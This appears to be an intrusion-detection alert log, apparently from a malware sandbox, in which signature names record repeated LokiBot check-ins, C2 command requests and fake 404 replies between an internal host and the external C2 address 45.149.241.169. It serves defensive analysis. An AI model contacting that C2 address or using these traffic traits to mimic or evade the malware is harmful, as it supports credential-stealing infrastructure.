2024-10-03T09:21:22.234810+0200	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.11	64373	45.149.241.169	80	TCP
2024-10-03T09:21:22.234810+0200	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.11	64373	45.149.241.169	80	TCP
2024-10-03T09:21:22.239708+0200	2025483	ET MALWARE LokiBot Fake 404 Response	1	45.149.241.169	80	192.168.2.11	64373	TCP
2024-10-03T09:21:22.386915+0200	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.11	64374	45.149.241.169	80	TCP
2024-10-03T09:21:22.386915+0200	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.11	64374	45.149.241.169	80	TCP
2024-10-03T09:21:22.386915+0200	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.11	64374	45.149.241.169	80	TCP
2024-10-03T09:21:23.090242+0200	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.11	64374	45.149.241.169	80	TCP
2024-10-03T09:21:23.090242+0200	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.11	64374	45.149.241.169	80	TCP
2024-10-03T09:21:23.095072+0200	2025483	ET MALWARE LokiBot Fake 404 Response	1	45.149.241.169	80	192.168.2.11	64374	TCP
2024-10-03T09:21:23.246842+0200	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.11	64375	45.149.241.169	80	TCP
2024-10-03T09:21:23.246842+0200	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.11	64375	45.149.241.169	80	TCP
2024-10-03T09:21:23.246842+0200	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.11	64375	45.149.241.169	80	TCP
2024-10-03T09:21:23.948484+0200	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.11	64375	45.149.241.169	80	TCP
2024-10-03T09:21:23.948484+0200	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.11	64375	45.149.241.169	80	TCP
2024-10-03T09:21:23.953248+0200	2025483	ET MALWARE LokiBot Fake 404 Response	1	45.149.241.169	80	192.168.2.11	64375	TCP
2024-10-03T09:21:24.104473+0200	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.11	64376	45.149.241.169	80	TCP
2024-10-03T09:21:24.104473+0200	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.11	64376	45.149.241.169	80	TCP
2024-10-03T09:21:24.104473+0200	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.11	64376	45.149.241.169	80	TCP
2024-10-03T09:21:24.875611+0200	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.11	64376	45.149.241.169	80	TCP
2024-10-03T09:21:24.875611+0200	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.11	64376	45.149.241.169	80	TCP
2024-10-03T09:21:24.880426+0200	2025483	ET MALWARE LokiBot Fake 404 Response	1	45.149.241.169	80	192.168.2.11	64376	TCP
2024-10-03T09:21:25.029228+0200	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.11	64378	45.149.241.169	80	TCP
2024-10-03T09:21:25.029228+0200	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.11	64378	45.149.241.169	80	TCP
2024-10-03T09:21:25.029228+0200	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.11	64378	45.149.241.169	80	TCP
2024-10-03T09:21:25.669335+0200	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.11	64378	45.149.241.169	80	TCP
2024-10-03T09:21:25.669335+0200	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.11	64378	45.149.241.169	80	TCP
2024-10-03T09:21:25.674220+0200	2025483	ET MALWARE LokiBot Fake 404 Response	1	45.149.241.169	80	192.168.2.11	64378	TCP
2024-10-03T09:21:25.820375+0200	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.11	64379	45.149.241.169	80	TCP
2024-10-03T09:21:25.820375+0200	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.11	64379	45.149.241.169	80	TCP
2024-10-03T09:21:25.820375+0200	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.11	64379	45.149.241.169	80	TCP
2024-10-03T09:21:26.688958+0200	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.11	64379	45.149.241.169	80	TCP
2024-10-03T09:21:26.688958+0200	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.11	64379	45.149.241.169	80	TCP
2024-10-03T09:21:26.693893+0200	2025483	ET MALWARE LokiBot Fake 404 Response	1	45.149.241.169	80	192.168.2.11	64379	TCP
2024-10-03T09:21:26.851586+0200	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.11	64380	45.149.241.169	80	TCP
2024-10-03T09:21:26.851586+0200	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.11	64380	45.149.241.169	80	TCP
2024-10-03T09:21:26.851586+0200	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.11	64380	45.149.241.169	80	TCP
2024-10-03T09:21:27.634586+0200	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.11	64380	45.149.241.169	80	TCP
2024-10-03T09:21:27.634586+0200	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.11	64380	45.149.241.169	80	TCP
2024-10-03T09:21:27.639571+0200	2025483	ET MALWARE LokiBot Fake 404 Response	1	45.149.241.169	80	192.168.2.11	64380	TCP
2024-10-03T09:21:27.810227+0200	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.11	64381	45.149.241.169	80	TCP
2024-10-03T09:21:27.810227+0200	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.11	64381	45.149.241.169	80	TCP
2024-10-03T09:21:27.810227+0200	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.11	64381	45.149.241.169	80	TCP
2024-10-03T09:21:28.548334+0200	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.11	64381	45.149.241.169	80	TCP
2024-10-03T09:21:28.548334+0200	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.11	64381	45.149.241.169	80	TCP
2024-10-03T09:21:28.553342+0200	2025483	ET MALWARE LokiBot Fake 404 Response	1	45.149.241.169	80	192.168.2.11	64381	TCP
2024-10-03T09:21:28.697925+0200	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.11	64382	45.149.241.169	80	TCP
2024-10-03T09:21:28.697925+0200	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.11	64382	45.149.241.169	80	TCP
2024-10-03T09:21:28.697925+0200	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.11	64382	45.149.241.169	80	TCP
2024-10-03T09:21:29.432337+0200	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.11	64382	45.149.241.169	80	TCP
2024-10-03T09:21:29.432337+0200	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.11	64382	45.149.241.169	80	TCP
2024-10-03T09:21:29.437160+0200	2025483	ET MALWARE LokiBot Fake 404 Response	1	45.149.241.169	80	192.168.2.11	64382	TCP
2024-10-03T09:21:29.591807+0200	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.11	64383	45.149.241.169	80	TCP
2024-10-03T09:21:29.591807+0200	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.11	64383	45.149.241.169	80	TCP
2024-10-03T09:21:29.591807+0200	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.11	64383	45.149.241.169	80	TCP
2024-10-03T09:21:30.259881+0200	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.11	64383	45.149.241.169	80	TCP
2024-10-03T09:21:30.259881+0200	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.11	64383	45.149.241.169	80	TCP
2024-10-03T09:21:30.264753+0200	2025483	ET MALWARE LokiBot Fake 404 Response	1	45.149.241.169	80	192.168.2.11	64383	TCP
2024-10-03T09:21:30.413511+0200	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.11	64384	45.149.241.169	80	TCP
2024-10-03T09:21:30.413511+0200	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.11	64384	45.149.241.169	80	TCP
2024-10-03T09:21:30.413511+0200	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.11	64384	45.149.241.169	80	TCP
2024-10-03T09:21:31.213756+0200	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.11	64384	45.149.241.169	80	TCP
2024-10-03T09:21:31.213756+0200	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.11	64384	45.149.241.169	80	TCP
2024-10-03T09:21:31.218885+0200	2025483	ET MALWARE LokiBot Fake 404 Response	1	45.149.241.169	80	192.168.2.11	64384	TCP
2024-10-03T09:21:31.498785+0200	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.11	64385	45.149.241.169	80	TCP
2024-10-03T09:21:31.498785+0200	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.11	64385	45.149.241.169	80	TCP
2024-10-03T09:21:31.498785+0200	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.11	64385	45.149.241.169	80	TCP
2024-10-03T09:21:32.591622+0200	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.11	64385	45.149.241.169	80	TCP
2024-10-03T09:21:32.591622+0200	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.11	64385	45.149.241.169	80	TCP
2024-10-03T09:21:32.603314+0200	2025483	ET MALWARE LokiBot Fake 404 Response	1	45.149.241.169	80	192.168.2.11	64385	TCP
2024-10-03T09:21:32.743030+0200	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.11	64386	45.149.241.169	80	TCP
2024-10-03T09:21:32.743030+0200	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.11	64386	45.149.241.169	80	TCP
2024-10-03T09:21:32.743030+0200	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.11	64386	45.149.241.169	80	TCP
2024-10-03T09:21:33.386243+0200	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.11	64386	45.149.241.169	80	TCP
2024-10-03T09:21:33.386243+0200	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.11	64386	45.149.241.169	80	TCP
2024-10-03T09:21:33.391128+0200	2025483	ET MALWARE LokiBot Fake 404 Response	1	45.149.241.169	80	192.168.2.11	64386	TCP
2024-10-03T09:21:33.556187+0200	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.11	64387	45.149.241.169	80	TCP
2024-10-03T09:21:33.556187+0200	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.11	64387	45.149.241.169	80	TCP
2024-10-03T09:21:33.556187+0200	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.11	64387	45.149.241.169	80	TCP
2024-10-03T09:21:35.070962+0200	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.11	64387	45.149.241.169	80	TCP
2024-10-03T09:21:35.070962+0200	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.11	64387	45.149.241.169	80	TCP
2024-10-03T09:21:35.071057+0200	2025483	ET MALWARE LokiBot Fake 404 Response	1	45.149.241.169	80	192.168.2.11	64387	TCP
2024-10-03T09:21:35.239657+0200	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.11	64388	45.149.241.169	80	TCP
2024-10-03T09:21:35.239657+0200	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.11	64388	45.149.241.169	80	TCP
2024-10-03T09:21:35.239657+0200	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.11	64388	45.149.241.169	80	TCP
2024-10-03T09:21:46.491936+0200	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.11	64388	45.149.241.169	80	TCP
2024-10-03T09:21:46.491936+0200	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.11	64388	45.149.241.169	80	TCP
2024-10-03T09:21:46.647501+0200	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.11	64389	45.149.241.169	80	TCP
2024-10-03T09:21:46.647501+0200	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.11	64389	45.149.241.169	80	TCP
2024-10-03T09:21:46.647501+0200	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.11	64389	45.149.241.169	80	TCP
2024-10-03T09:21:47.323870+0200	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.11	64389	45.149.241.169	80	TCP
2024-10-03T09:21:47.323870+0200	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.11	64389	45.149.241.169	80	TCP
2024-10-03T09:21:47.328778+0200	2025483	ET MALWARE LokiBot Fake 404 Response	1	45.149.241.169	80	192.168.2.11	64389	TCP
2024-10-03T09:21:47.487101+0200	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.11	64390	45.149.241.169	80	TCP
2024-10-03T09:21:47.487101+0200	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.11	64390	45.149.241.169	80	TCP
2024-10-03T09:21:47.487101+0200	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.11	64390	45.149.241.169	80	TCP
2024-10-03T09:21:48.281112+0200	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.11	64390	45.149.241.169	80	TCP
2024-10-03T09:21:48.281112+0200	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.11	64390	45.149.241.169	80	TCP
2024-10-03T09:21:48.285934+0200	2025483	ET MALWARE LokiBot Fake 404 Response	1	45.149.241.169	80	192.168.2.11	64390	TCP
2024-10-03T09:21:48.440836+0200	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.11	64391	45.149.241.169	80	TCP
2024-10-03T09:21:48.440836+0200	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.11	64391	45.149.241.169	80	TCP
2024-10-03T09:21:48.440836+0200	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.11	64391	45.149.241.169	80	TCP
2024-10-03T09:21:49.089316+0200	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.11	64391	45.149.241.169	80	TCP
2024-10-03T09:21:49.089316+0200	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.11	64391	45.149.241.169	80	TCP
2024-10-03T09:21:49.095497+0200	2025483	ET MALWARE LokiBot Fake 404 Response	1	45.149.241.169	80	192.168.2.11	64391	TCP
2024-10-03T09:21:49.258711+0200	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.11	64392	45.149.241.169	80	TCP
2024-10-03T09:21:49.258711+0200	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.11	64392	45.149.241.169	80	TCP
2024-10-03T09:21:49.258711+0200	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.11	64392	45.149.241.169	80	TCP
2024-10-03T09:21:50.342573+0200	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.11	64392	45.149.241.169	80	TCP
2024-10-03T09:21:50.342573+0200	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.11	64392	45.149.241.169	80	TCP
2024-10-03T09:21:50.342633+0200	2025483	ET MALWARE LokiBot Fake 404 Response	1	45.149.241.169	80	192.168.2.11	64392	TCP
2024-10-03T09:21:50.499694+0200	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.11	64393	45.149.241.169	80	TCP
2024-10-03T09:21:50.499694+0200	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.11	64393	45.149.241.169	80	TCP
2024-10-03T09:21:50.499694+0200	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.11	64393	45.149.241.169	80	TCP
2024-10-03T09:21:51.138044+0200	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.11	64393	45.149.241.169	80	TCP
2024-10-03T09:21:51.138044+0200	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.11	64393	45.149.241.169	80	TCP
2024-10-03T09:21:51.142841+0200	2025483	ET MALWARE LokiBot Fake 404 Response	1	45.149.241.169	80	192.168.2.11	64393	TCP
2024-10-03T09:21:51.287566+0200	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.11	64394	45.149.241.169	80	TCP
2024-10-03T09:21:51.287566+0200	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.11	64394	45.149.241.169	80	TCP
2024-10-03T09:21:51.287566+0200	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.11	64394	45.149.241.169	80	TCP
2024-10-03T09:21:51.987281+0200	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.11	64394	45.149.241.169	80	TCP
2024-10-03T09:21:51.987281+0200	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.11	64394	45.149.241.169	80	TCP
2024-10-03T09:21:51.992201+0200	2025483	ET MALWARE LokiBot Fake 404 Response	1	45.149.241.169	80	192.168.2.11	64394	TCP
2024-10-03T09:21:52.148748+0200	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.11	64395	45.149.241.169	80	TCP
2024-10-03T09:21:52.148748+0200	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.11	64395	45.149.241.169	80	TCP
2024-10-03T09:21:52.148748+0200	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.11	64395	45.149.241.169	80	TCP
2024-10-03T09:21:52.824432+0200	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.11	64395	45.149.241.169	80	TCP
2024-10-03T09:21:52.824432+0200	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.11	64395	45.149.241.169	80	TCP
2024-10-03T09:21:52.829891+0200	2025483	ET MALWARE LokiBot Fake 404 Response	1	45.149.241.169	80	192.168.2.11	64395	TCP
2024-10-03T09:21:52.981934+0200	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.11	64396	45.149.241.169	80	TCP
2024-10-03T09:21:52.981934+0200	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.11	64396	45.149.241.169	80	TCP
2024-10-03T09:21:52.981934+0200	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.11	64396	45.149.241.169	80	TCP
2024-10-03T09:21:53.813148+0200	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.11	64396	45.149.241.169	80	TCP
2024-10-03T09:21:53.813148+0200	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.11	64396	45.149.241.169	80	TCP
2024-10-03T09:21:53.827051+0200	2025483	ET MALWARE LokiBot Fake 404 Response	1	45.149.241.169	80	192.168.2.11	64396	TCP
2024-10-03T09:21:54.007169+0200	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.11	64397	45.149.241.169	80	TCP
2024-10-03T09:21:54.007169+0200	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.11	64397	45.149.241.169	80	TCP
2024-10-03T09:21:54.007169+0200	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.11	64397	45.149.241.169	80	TCP
2024-10-03T09:21:54.779943+0200	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.11	64397	45.149.241.169	80	TCP
2024-10-03T09:21:54.779943+0200	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.11	64397	45.149.241.169	80	TCP
2024-10-03T09:21:54.795139+0200	2025483	ET MALWARE LokiBot Fake 404 Response	1	45.149.241.169	80	192.168.2.11	64397	TCP
2024-10-03T09:21:54.945256+0200	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.11	64398	45.149.241.169	80	TCP
2024-10-03T09:21:54.945256+0200	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.11	64398	45.149.241.169	80	TCP
2024-10-03T09:21:54.945256+0200	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.11	64398	45.149.241.169	80	TCP
2024-10-03T09:21:55.743930+0200	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.11	64398	45.149.241.169	80	TCP
2024-10-03T09:21:55.743930+0200	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.11	64398	45.149.241.169	80	TCP
2024-10-03T09:21:55.749129+0200	2025483	ET MALWARE LokiBot Fake 404 Response	1	45.149.241.169	80	192.168.2.11	64398	TCP
2024-10-03T09:21:55.920209+0200	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.11	64399	45.149.241.169	80	TCP
2024-10-03T09:21:55.920209+0200	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.11	64399	45.149.241.169	80	TCP
2024-10-03T09:21:55.920209+0200	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.11	64399	45.149.241.169	80	TCP
2024-10-03T09:21:57.049613+0200	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.11	64399	45.149.241.169	80	TCP
2024-10-03T09:21:57.049613+0200	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.11	64399	45.149.241.169	80	TCP
2024-10-03T09:21:57.080376+0200	2025483	ET MALWARE LokiBot Fake 404 Response	1	45.149.241.169	80	192.168.2.11	64399	TCP
2024-10-03T09:21:57.220850+0200	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.11	64400	45.149.241.169	80	TCP
2024-10-03T09:21:57.220850+0200	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.11	64400	45.149.241.169	80	TCP
2024-10-03T09:21:57.220850+0200	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.11	64400	45.149.241.169	80	TCP
2024-10-03T09:21:58.009483+0200	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.11	64400	45.149.241.169	80	TCP
2024-10-03T09:21:58.009483+0200	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.11	64400	45.149.241.169	80	TCP
2024-10-03T09:21:58.015493+0200	2025483	ET MALWARE LokiBot Fake 404 Response	1	45.149.241.169	80	192.168.2.11	64400	TCP
2024-10-03T09:21:58.171912+0200	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.11	64401	45.149.241.169	80	TCP
2024-10-03T09:21:58.171912+0200	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.11	64401	45.149.241.169	80	TCP
2024-10-03T09:21:58.171912+0200	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.11	64401	45.149.241.169	80	TCP
2024-10-03T09:21:58.968924+0200	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.11	64401	45.149.241.169	80	TCP
2024-10-03T09:21:58.968924+0200	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.11	64401	45.149.241.169	80	TCP
2024-10-03T09:21:58.973834+0200	2025483	ET MALWARE LokiBot Fake 404 Response	1	45.149.241.169	80	192.168.2.11	64401	TCP
2024-10-03T09:21:59.151255+0200	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.11	64402	45.149.241.169	80	TCP
2024-10-03T09:21:59.151255+0200	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.11	64402	45.149.241.169	80	TCP
2024-10-03T09:21:59.151255+0200	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.11	64402	45.149.241.169	80	TCP
2024-10-03T09:21:59.912717+0200	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.11	64402	45.149.241.169	80	TCP
2024-10-03T09:21:59.912717+0200	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.11	64402	45.149.241.169	80	TCP
2024-10-03T09:21:59.929539+0200	2025483	ET MALWARE LokiBot Fake 404 Response	1	45.149.241.169	80	192.168.2.11	64402	TCP
2024-10-03T09:22:00.075267+0200	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.11	64403	45.149.241.169	80	TCP
2024-10-03T09:22:00.075267+0200	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.11	64403	45.149.241.169	80	TCP
2024-10-03T09:22:00.075267+0200	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.11	64403	45.149.241.169	80	TCP
2024-10-03T09:22:00.875995+0200	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.11	64403	45.149.241.169	80	TCP
2024-10-03T09:22:00.875995+0200	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.11	64403	45.149.241.169	80	TCP
2024-10-03T09:22:00.880849+0200	2025483	ET MALWARE LokiBot Fake 404 Response	1	45.149.241.169	80	192.168.2.11	64403	TCP
2024-10-03T09:22:01.051486+0200	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.11	64404	45.149.241.169	80	TCP
2024-10-03T09:22:01.051486+0200	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.11	64404	45.149.241.169	80	TCP
2024-10-03T09:22:01.051486+0200	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.11	64404	45.149.241.169	80	TCP
2024-10-03T09:22:02.986735+0200	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.11	64404	45.149.241.169	80	TCP
2024-10-03T09:22:02.986735+0200	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.11	64404	45.149.241.169	80	TCP
2024-10-03T09:22:02.998303+0200	2025483	ET MALWARE LokiBot Fake 404 Response	1	45.149.241.169	80	192.168.2.11	64404	TCP
2024-10-03T09:22:03.157629+0200	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.11	64405	45.149.241.169	80	TCP
2024-10-03T09:22:03.157629+0200	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.11	64405	45.149.241.169	80	TCP
2024-10-03T09:22:03.157629+0200	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.11	64405	45.149.241.169	80	TCP
2024-10-03T09:22:03.927136+0200	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.11	64405	45.149.241.169	80	TCP
2024-10-03T09:22:03.927136+0200	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.11	64405	45.149.241.169	80	TCP
2024-10-03T09:22:03.932185+0200	2025483	ET MALWARE LokiBot Fake 404 Response	1	45.149.241.169	80	192.168.2.11	64405	TCP
2024-10-03T09:22:04.115545+0200	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.11	64406	45.149.241.169	80	TCP
2024-10-03T09:22:04.115545+0200	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.11	64406	45.149.241.169	80	TCP
2024-10-03T09:22:04.115545+0200	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.11	64406	45.149.241.169	80	TCP
2024-10-03T09:22:04.921954+0200	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.11	64406	45.149.241.169	80	TCP
2024-10-03T09:22:04.921954+0200	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.11	64406	45.149.241.169	80	TCP
2024-10-03T09:22:04.926899+0200	2025483	ET MALWARE LokiBot Fake 404 Response	1	45.149.241.169	80	192.168.2.11	64406	TCP
2024-10-03T09:22:05.338912+0200	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.11	64407	45.149.241.169	80	TCP
2024-10-03T09:22:05.338912+0200	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.11	64407	45.149.241.169	80	TCP
2024-10-03T09:22:05.338912+0200	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.11	64407	45.149.241.169	80	TCP
2024-10-03T09:22:06.114484+0200	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.11	64407	45.149.241.169	80	TCP
2024-10-03T09:22:06.114484+0200	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.11	64407	45.149.241.169	80	TCP
2024-10-03T09:22:06.119391+0200	2025483	ET MALWARE LokiBot Fake 404 Response	1	45.149.241.169	80	192.168.2.11	64407	TCP
2024-10-03T09:22:06.283716+0200	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.11	64408	45.149.241.169	80	TCP
2024-10-03T09:22:06.283716+0200	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.11	64408	45.149.241.169	80	TCP
2024-10-03T09:22:06.283716+0200	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.11	64408	45.149.241.169	80	TCP
